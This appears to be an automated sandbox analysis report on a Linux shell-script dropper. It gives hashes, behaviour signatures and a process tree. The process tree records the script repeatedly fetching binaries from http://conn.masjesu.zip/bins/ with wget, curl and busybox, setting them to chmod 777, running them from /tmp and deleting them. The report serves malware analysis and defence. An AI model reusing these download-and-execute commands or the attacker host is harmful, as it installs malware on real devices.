Analysis
-
max time kernel
149s -
max time network
148s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:15
Static task
static1
Behavioral task
behavioral1
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
-
Size
10KB
-
MD5
62c3af5d98480e4bfccd186de98627f5
-
SHA1
b814830f919dbd09114e657b1657554d719d9fb7
-
SHA256
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4
-
SHA512
32736f2421c49416705f2f773c0a659184e55a3fb4c329ad0a008b34fc43b59ec7d1100fac4fb4674776e5e02e46cf7729e29bb6491e99ba220e53df38489bf2
-
SSDEEP
192:G5B87XQQiZG/rqpxwZWOzkUZ/rqpxt5B87XSWkUzN:yQccZV9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 866 chmod 887 chmod 901 chmod 922 chmod 936 chmod 964 chmod 1002 chmod 880 chmod 908 chmod 929 chmod 950 chmod 981 chmod 988 chmod 915 chmod 777 chmod 798 chmod 842 chmod 849 chmod 859 chmod 873 chmod 894 chmod 943 chmod 957 chmod 835 chmod 974 chmod 995 chmod -
Executes dropped EXE 26 IoCs
ioc pid Process /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 779 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 799 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 836 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 843 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 850 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 860 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 867 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 874 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 881 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 888 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 895 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD 902 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA 909 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 916 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 923 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 930 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 937 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 944 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 951 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 958 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 965 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 975 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 982 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 989 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 996 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 1003 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 856 curl 869 wget 876 wget 905 curl 846 curl 954 curl 961 curl 963 busybox 984 wget 865 busybox 928 busybox 932 wget 872 busybox 877 curl 953 wget 980 busybox 820 curl 839 curl 883 wget 914 busybox 942 busybox 967 wget 994 busybox 795 curl 858 busybox 918 wget 933 curl 947 curl 960 wget 841 busybox 862 wget 911 wget 991 wget 783 wget 848 busybox 919 curl 977 wget 985 curl 987 busybox 921 busybox 1008 busybox 767 busybox 797 busybox 879 busybox 886 busybox 897 wget 900 busybox 949 busybox 834 busybox 863 curl 904 wget 907 busybox 935 busybox 940 curl 801 wget 912 curl 925 wget 968 curl 992 curl 1005 wget 1006 curl 721 wget 758 curl 838 wget -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl
Processes
-
/tmp/9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh/tmp/9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:717
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:721
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:767
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:781
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:783
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:797
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:800
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:801
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:837
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:848
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:893
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:950
-
-
